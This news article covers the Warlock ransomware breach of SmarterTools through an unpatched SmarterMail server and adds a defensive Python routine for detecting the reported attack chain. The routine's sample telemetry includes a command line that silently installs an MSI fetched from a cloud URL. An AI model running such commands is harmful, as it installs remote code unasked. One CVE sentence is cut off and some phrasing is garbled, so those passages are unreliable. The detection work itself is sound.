Warlock Ransomware Breaches SmarterTools via Unpatched SmarterMail Server

SmarterTools confirmed last week that the Warlock (aka Storm-2603) group breached its network and deployed ransomware using an unpatched instance of SmarterMail.
The incident occurred on January 29, 2026, when an email server that had not been updated to the latest version was compromised, said Chief Commercial Officer Derek Curtis.
“Prior to the breach, we had about 30 servers/VMs installed with SmarterMail across our network,” explained Curtis. “Unfortunately, we were not aware of one VM, set up by an employee, that could be updated. As a result, that mail server was compromised, leading to the breach.”
However, SmarterTools emphasized that the breach did not affect its website, shopping cart, My Account portal, or several other services, and that no business applications or account data were affected or compromised.
About 12 Windows servers in the company’s office network, as well as a second data center used for quality control (QC) testing, were confirmed to be affected. According to its CEO, Tim Uzzanti, “attempted ransomware attacks” also affected customers using hosted SmarterTrack.
“Hosted customers using SmarterTrack are the most affected,” Uzzanti said in a separate thread on the Community Portal. “This was not due to any problem within SmarterTrack itself, but because that area was more accessible than others if they breached our network.”
In addition, SmarterTools admitted that the Warlock group waited several days after gaining initial access before moving to the Active Directory server and creating new users, then dropped additional payloads such as Velociraptor and a file-encrypting locker.
“Once these bad actors gain access, they typically install files and wait about 6-7 days before taking any further action,” Curtis said. “This explains why some customers experienced regressions even after the update — the first breach happened before the update, but the bad work was started later.”
It is not yet clear which SmarterMail vulnerability the attackers used, but it is worth noting that several flaws in the email software – CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-24423 (CV.
CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request. CVE-2026-24423, on the other hand, is a vulnerability in the ConnectToHub API method that can be exploited to achieve remote code execution (RCE).
SmarterTools addressed the vulnerability in build 9511. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) confirmed that CVE-2026-24423 was being exploited in a ransomware attack.
In a report published Monday, cybersecurity firm ReliaQuest said it had identified a possible exploit chain linked to Warlock that uses CVE-2026-23760 to bypass authentication and deploy a ransomware payload on Internet-facing systems. The initial access is also used to download a malicious MSI installer (“v4.msi”) from Supabase, a legitimate cloud-based backend platform, to install Velociraptor.
“While this vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 restricts this access with a built-in ‘Volume Mount’ software feature to gain full control of the system,” said security researcher Alexa Feminella. “Upon entry, the group installs Velociraptor, an official digital forensics tool it has used in previous campaigns, to maintain access and stage ransomware.”
The security firm also noted that the two vulnerabilities lead to the same outcome: CVE-2026-23760 provides unauthorized administrative access through the password reset API, which can be chained with additional steps to achieve code execution, while CVE-2026-24423 provides a direct path to code execution.
That attackers are pursuing the former approach suggests it lets malicious activity blend into normal administrative workflows, helping them avoid detection.
“By abusing legitimate features (password reset and drive mounting) instead of relying solely on a single ‘noisy’ exploit, operators may reduce the effectiveness of detections specifically tuned for known RCE patterns,” added Feminella. “This speed of weaponization is consistent with ransomware operators who quickly analyze vendor fixes and develop active trades shortly after release.”
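The two points above that matter most to a defender are the sequence (administrative password reset, then an MSI pulled from a cloud host, then a Velociraptor service) and the 6-7 day gap Curtis describes between initial access and follow-on activity, which means a reset observed before the patch can still be the start of a chain that fires after it. The following is an added example, not code from the article, SmarterTools or ReliaQuest: a small correlation routine run over constructed telemetry. The reset API path, internal address ranges, host names and timestamps are all assumptions made up for the example; SmarterMail's real endpoint is not stated on the page and would have to be substituted.

```python
"""Correlate an admin password reset with a later untrusted MSI install and a
Velociraptor service on the same host, reporting the dwell time in between.
All telemetry here is constructed for the example; nothing is real log data."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from urllib.parse import urlparse

# Hypothetical reset endpoint: a placeholder for the vendor's actual API path.
ADMIN_RESET_PATH = "/api/v1/auth/reset-system-admin-password"
# Constructed allowlist of hosts from which software installs are expected.
TRUSTED_INSTALL_HOSTS = {"updates.example-corp.internal"}
# Constructed internal ranges; anything outside them counts as external.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Look-ahead window; generously covers the 6-7 day wait quoted in the article.
DWELL_WINDOW = timedelta(days=10)

# Constructed sample telemetry (one compromised host, one benign host).
EVENTS = [
    {"ts": "2026-01-22T03:14:00", "host": "mail-vm-17", "kind": "http",
     "path": ADMIN_RESET_PATH, "src_ip": "203.0.113.45", "status": 200},
    {"ts": "2026-01-22T03:15:10", "host": "mail-vm-17", "kind": "login",
     "user": "admin", "src_ip": "203.0.113.45"},
    {"ts": "2026-01-29T01:02:00", "host": "mail-vm-17", "kind": "process",
     "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i https://abc123.supabase.co/storage/v1/object/public/pkg/v4.msi /qn"},
    {"ts": "2026-01-29T01:03:30", "host": "mail-vm-17", "kind": "service",
     "name": "Velociraptor", "image": r"C:\Program Files\Velociraptor\velociraptor.exe"},
    # Benign: internal reset followed by an install from the trusted host.
    {"ts": "2026-01-25T09:00:00", "host": "mail-vm-02", "kind": "http",
     "path": ADMIN_RESET_PATH, "src_ip": "10.0.0.8", "status": 200},
    {"ts": "2026-01-25T09:30:00", "host": "mail-vm-02", "kind": "process",
     "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i https://updates.example-corp.internal/agent.msi /qn"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def _is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def _msi_source(cmdline):
    """Return the hostname of the first http(s) URL on an msiexec command line."""
    for token in cmdline.split():
        if token.lower().startswith(("http://", "https://")):
            return urlparse(token).hostname
    return None


def find_chains(events, window=DWELL_WINDOW):
    """Return one alert per successful admin reset that is followed, within the
    window, by an MSI install from a host outside the allowlist. Each alert
    lists the stages seen and the dwell time (days) from reset to install."""
    by_host = {}
    for event in sorted(events, key=_ts):
        by_host.setdefault(event["host"], []).append(event)

    alerts = []
    for host, evs in by_host.items():
        for i, reset in enumerate(evs):
            if (reset["kind"] != "http" or reset.get("path") != ADMIN_RESET_PATH
                    or reset.get("status") != 200):
                continue
            stages = ["admin_password_reset"]
            if _is_external(reset["src_ip"]):
                stages.append("external_source")
            install_at = None
            for later in evs[i + 1:]:
                if _ts(later) - _ts(reset) > window:
                    break
                if later["kind"] == "process" and later["image"].lower() == "msiexec.exe":
                    source = _msi_source(later["cmdline"])
                    if source and source not in TRUSTED_INSTALL_HOSTS:
                        stages.append("untrusted_msi_install")
                        install_at = _ts(later)
                elif later["kind"] == "service" and "velociraptor" in later["name"].lower():
                    stages.append("velociraptor_service")
            if install_at is not None:
                dwell = round((install_at - _ts(reset)).total_seconds() / 86400, 1)
                alerts.append({"host": host, "reset_at": reset["ts"],
                               "stages": stages, "dwell_days": dwell})
    return alerts


if __name__ == "__main__":
    for alert in find_chains(EVENTS):
        print(alert)
```

The benign host is deliberately included: a reset from an internal address followed by an installer from the allowlisted host produces no alert, which is the behaviour a rule keyed only on the reset API would get wrong. The look-ahead window is what makes the dwell-time point actionable; a rule that closes its correlation after hours rather than days would never join the reset to the install.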
SmarterMail users are advised to upgrade immediately to the latest version (Build 9526) and to isolate email servers so as to block the traffic used to deliver ransomware.